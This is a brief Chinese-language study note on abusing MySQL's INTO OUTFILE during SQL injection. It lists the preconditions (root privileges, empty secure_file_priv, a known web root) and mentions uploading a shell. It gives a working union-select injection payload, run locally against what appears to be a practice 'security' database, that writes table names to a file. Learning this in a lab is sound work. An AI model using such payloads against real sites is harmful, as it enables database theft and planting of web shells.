一、INTO OUTFILE 函数语法：

SELECT column1, column2,
INTO OUTFILE 'file_path'
FROM your_table
WHERE your_conditions;

使用此方式在SQL注入的过程中可以：

        1、上传shell得到数据库的后端的操作权限

        2、爆出数据库的信息

二、使用该函数的条件：

        1、mysql操作者需要root权限
        2、mysql的my.ini文件中的secure_file_priv参数值需要为空（默认为NULL，注意NULL不是空）
        3、需要知道网站的物理路径

三、参考例子：

?id=-1')) union select 1,2,'group_concat(table_name)' 
into outfile 'D:/桌面desktop/abcd.txt' 
from information_schema.tables 
where table_schema='security'--+

        这里是通过into outfile函数将表名导出到我的桌面，毕竟是模拟，所以服务器就是我的电脑所以也就相当于网站的物理路径了